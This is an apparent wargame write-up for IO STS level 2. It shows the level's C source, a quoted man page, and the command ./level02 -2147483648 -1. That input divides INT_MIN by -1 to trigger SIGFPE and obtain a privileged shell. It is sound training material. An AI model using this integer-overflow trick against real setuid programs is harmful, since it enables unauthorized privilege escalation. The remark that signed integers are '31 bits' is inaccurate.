Level 2, IO STS

We can use the password found from the previous level to access the server as level2 user.

Looking around, we can see that we are given the level02.c source code as well as the compiled binary level02 to work with. Let’s take a look at the source code for level2.

//a little fun brought to you by bla

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>

void catcher(int a)
{
   setresuid(geteuid(),geteuid(),geteuid());
   printf("WIN!\n");
   system("/bin/sh");
   exit(0);
}

int main(int argc, char **argv)
{
   puts("source code is available in level02.c\n");

   if (argc != 3 || !atoi(argv[2]))
           return 1;
   signal(SIGFPE, catcher);
   return abs(atoi(argv[1])) / atoi(argv[2]);
}

Analysing the code, we can see that we want the catcher function to execute. We can do that if we provide 3 arguments and the third argument cannot be 0. Note: In Linux, the program name is considered as one argument. With that in mind, our program would be of the form ./level02 arg1 arg2.

Now to actually cause the function catcher to execute, we have to cause a SIGFPE signal. How does that work? Looking into the manual page of signal.

SIGNAL(2)                 Linux Programmer's Manual                 SIGNAL(2)

NAME
       signal - ANSI C signal handling

SYNOPSIS
       #include <signal.h>

       typedef void (*sighandler_t)(int);

       sighandler_t signal(int signum, sighandler_t handler);

DESCRIPTION
       The  behavior  of  signal()  varies across UNIX versions, and has also
       varied historically across different versions  of  Linux.   Avoid  its
       use: use sigaction(2) instead.  See Portability below.

       signal()  sets  the disposition of the signal signum to handler, which
       is either SIG_IGN, SIG_DFL, or the  address  of  a  programmer-defined
       function (a "signal handler").

       If the signal signum is delivered to the process, then one of the fol-
       lowing happens:

       *  If the disposition is set to SIG_IGN, then the signal is ignored.

       *  If the disposition is set to SIG_DFL, then the default action asso-
          ciated with the signal (see signal(7)) occurs.

       *  If the disposition is set to a function, then first either the dis-
          position is reset to SIG_DFL, or the signal is blocked (see  Porta-
          bility below), and then handler is called with argument signum.  If
          invocation of the handler caused the signal to be blocked, then the
          signal is unblocked upon return from the handler.

       The signals SIGKILL and SIGSTOP cannot be caught or ignored.

RETURN VALUE
       signal()  returns the previous value of the signal handler, or SIG_ERR
       on error.

ERRORS
       EINVAL signum is invalid.

CONFORMING TO
       C89, C99, POSIX.1-2001.

NOTES
       The effects of signal() in a multithreaded process are unspecified.

       According to POSIX, the behavior of a process is  undefined  after  it
       ignores  a SIGFPE, SIGILL, or SIGSEGV signal that was not generated by
       kill(2) or raise(3).  Integer division by zero has  undefined  result.
       On  some architectures it will generate a SIGFPE signal.  (Also divid-
       ing the most negative integer by -1 may  generate  SIGFPE.)   Ignoring
       this signal might lead to an endless loop.

       ...
       ...

We found what we are looking for! By dividing the most negative integer by -1, we might be able to generate a SIGFPE signal.

Unsigned integers are 32 bits, signed integers are 31 bits as the most significant bit is used to denote the polarity of the integer. Therefore, the most negative integer is \(-1 \times 2{31} = -2147483648\). So let’s try it out.

level2@io:/levels$ ./level02 -2147483648 -1
source code is available in level02.c

WIN!
sh-4.2$ whoami
level3
sh-4.2$

You’ll be able to find the password in the same location. As usual, write it down somewhere so you don’t have to do the level again to get the password.

Stanley Tan
@stnly